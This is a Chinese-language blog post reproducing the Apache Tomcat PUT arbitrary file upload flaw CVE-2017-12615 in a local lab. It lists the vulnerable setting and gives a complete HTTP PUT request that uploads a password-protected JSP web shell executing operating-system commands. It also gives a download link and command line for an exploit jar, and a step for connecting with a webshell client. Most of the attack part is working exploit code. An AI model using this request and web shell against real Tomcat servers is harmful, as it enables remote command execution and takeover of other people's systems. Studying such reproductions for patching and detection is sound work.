• Tomcat PUT方法任意文件上传(CVE-2017-12615)


    目录

    漏洞复现:

    漏洞利用工具:


    漏洞环境当 Tomcat运行在Windows操作系统,且启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求上传任意文件,包括JSP类型的木马。
    影响范围Apache Tomcat 7.0.0 - 7.0.81

    漏洞复现:

    Tomcat版本:Tomcat 7.0.39

    打开Tomcat安装目录的 confweb.xml ,添加如下配置。在Tomcat7.0版本下默认配置是开启readonly的,需要手动配置readonly为false才可以进行漏洞利用。

    抓包,修改方式为OPTIONS,发现允许PUT方法

    将数据包修改为如下,点击 Go (我们可以将PUT的内容修改为其他类型的JSP木马)

    PUT /test.jsp/ HTTP/1.1
    Host: 127.0.0.1:8080
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
    Connection: close
    Content-Length: 423
    
    <%
        if("123".equals(request.getParameter("pwd"))){
            java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
            int a = -1;          
            byte[] b = new byte[1024];          
            out.print("<pre>");          
            while((a=in.read(b))!=-1){
                out.println(new String(b));          
            }
            out.print("</pre>");
        } 
    %>

    访问网站根目录下的test.jsp

    漏洞利用工具:

    https://download.csdn.net/download/qq_36119192/11665567

    java -jar CVE-2017-12615-Exploit.jar http://127.0.0.1:8080/ test.jsp 木马文件的路径

    然后,用冰蝎连接 http://127.0.0.1:8080/test.jsp 即可。

  • 相关阅读:
    rollback
    引用类型(C# 参考)
    委托(C# 编程指南)
    解决“在证书存储区中找不到清单签名证书”
    C#语法——委托,架构的血液
    广东IP段列表
    mysql字段类型
    linux远程管理工具:putty
    SQL yog过期后教你怎么让他不过期
    js实现的美女瀑布流效果代码
  • 原文地址:https://www.cnblogs.com/csnd/p/11807645.html
Copyright © 2020-2023  润新知